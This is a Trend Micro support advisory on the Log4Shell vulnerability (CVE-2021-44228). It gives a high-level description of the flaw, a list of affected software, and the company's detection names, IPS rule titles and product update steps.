Sign In with your
Trend Micro Account
Need Help?
Need More Help?

Create a technical support case if you need further support.

Log4Shell Malware Information

    • Updated:
    • 13 Dec 2021
    • Product/Version:
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Apex One 2019
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud App Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Application Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - Container Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Cloud One - File Storage Security
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Email Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Discovery Inspector
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Deep Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • Hosted Email Security
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • InterScan Messaging Security Suite
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • Interscan Web Security Virtual Appliance
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • ScanMail for Exchange
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Trend Micro Email Security
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Worry-Free Business Security Standard
    • Platform:
Summary

On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.

This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as "Log4Shell" in various blogs and reports.

This CVE-2021-44228 is a Java Naming and Directory InterfaceTM (JNDI) injection vulnerability in the affected versions of Log4j listed above. It can be triggered when a system using an affected version of Log4j 2 includes untrusted data in the logged message. If this data includes a crafted malicious payload, a JNDI lookup is made to a malicious server. Depending on the information sent back (response), a malicious Java object may be loaded, which could eventually lead to RCE. Additionally, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

AFFECTED SOFTWARE

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

INFECTION ROUTINE

Log4Shell Threat Advisory - Infection Routine

AVAILABLE SOLUTIONS

File Reputation

Detection/Policy/RulesPattern Branch/VersionRelease Date
Trojan.Linux.MIRAI.SEMR
Backdoor.Linux.MIRAI.SMF
Backdoor.Linux.MIRAI.SME
17.247.0012 Dec 2021
Trojan.SH.CVE20207961.SM17.247.0013 Dec 2021
Backdoor.Linux.MIRAI.SEMR
Trojan.SH.MIRAI.MKF
Coinminer.Linux.KINSING.D
17.248.0413 Dec 2021

Predictive Machine Learning

DetectionPattern Branch/Version
Troj.ELF.TRX.XXELFC1DFF009In-the-cloud
Troj.ELF.TRX.XXELFC1DFF012In-the-cloud

Behavior Monitoring

Pattern Branch/VersionRelease Date
SEN5985S / TMTD 256512 Dec 2021

Web Reputation

URLCategoryBlocking Date
URL Protection (Over 1700 URLs blocked)Malware AccompliceIn-the-cloud

NETWORK PATTERN

Trend Micro Cloud One - Workload Security and Deep Security IPS Rules

  • Rule 1011242 - Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  • Rule 1005177 - Restrict Java Bytecode File (Jar/Class) Download
  • Rule 1008610 - Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request

Trend Micro Cloud One - Workload Security and Deep Security Log Inspection

  • LI Rule 1011241 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Trend Micro Cloud One - Network Security and TippingPoint DVToolkit CSW file CVE-2021-44228

  • Filter C1000001 : HTTP: JNDI Injection in HTTP Header or URI

Trend Micro Deep Discovery Inspector

  • Proactive Detection:
    • DDI Rule 4280: "HTTP_POSSIBLE_USERAGENT_RCE_EXPLOIT_REQUEST"
  • Protection Solutions:
    • Released in NCIP 1.14747.00:
      • DDI Rule 4641:"CVE-2021-44228 - OGNL EXPLOIT - HTTP(REQUEST)"
      • DDI Rule 4643:"POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT - HTTP (REQUEST) - Variant 2" (disabled by default)
    • Released in NCIP 1.14749.00:
      • DDI Rule 4642:"POSSIBLE HTTP HEADER OGNL EXPRESSION EXPLOIT - HTTP(REQUEST)"
Details
Public

Solution Map - What should customers do?

Trend Micro SolutionsMajor ProductsLatest VersionsVirus PatternAnti-Spam PatternNetwork PatternBehavior MonitoringPredictive Machine LearningWeb Reputation
Endpoint SecurityApexOne2019 (Critical Patch - Server Build 9204 and Agent Build 9179)Update pattern via web consoleNot ApplicableUpdate pattern via web consoleEnable Behavior Monitoring and update pattern via web consoleEnable Predictive Machine LearningEnable Web Reputation Service and update pattern via web console
Worry-Free Business SecurityStandard (10.0)
Advanced (10.0)Update pattern via web console
Hybrid Cloud SecurityDeep Security20.0Update pattern via web consoleNot ApplicableUpdate pattern via web consoleEnable Behavior Monitoring and update pattern via web consoleEnable Predictive Machine LearningEnable Web Reputation Service and update pattern via web console
Cloud One - File Storage Security (SaaS)N/AUpdated AutomaticallyNot ApplicableNot ApplicableNot ApplicableNot Applicable
Cloud One - Application Security (SaaS)Updated automatically
Cloud One - Container Security (SaaS)Not applicable
Email and Gateway SecurityDeep Discovery Email Inspector5.1Update pattern via web consoleUpdate pattern via web consoleUpdate pattern via web consoleNot ApplicableEnable Predictive Machine LearningEnable Web Reputation Service and update pattern via web console
InterScan Messaging Security9.1Not ApplicableNot Applicable
InterScan Web Security / InterScan Web Security Virtual Appliance6.5
ScanMail for Microsoft Exchange14.0
Cloud App Security (SaaS)N/AUpdated AutomaticallyUpdated AutomaticallyEnable Predictive Machine Learning
Hosted Email Security (SaaS)
Email Security (SaaS)
Network SecurityDeep Discovery Inspector5.8Update pattern via web consoleNot ApplicableUpdate pattern via web consoleNot ApplicableNot ApplicableEnable Web Reputation Service and update pattern via web console

To update TrendMicro products, you may refer to the Online Help Center.

Recommendations

Threat Reports

Other Information

Premium
Internal
Partner
Rating:
Category:
Remove a Malware / Virus
Solution Id:
000289946
Feedback
Did this article help you?

Thank you for your feedback!


*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.

If you need additional help, you may try to contact the support team. Contact Support

To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:
We will not send you spam or share your email address.

*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.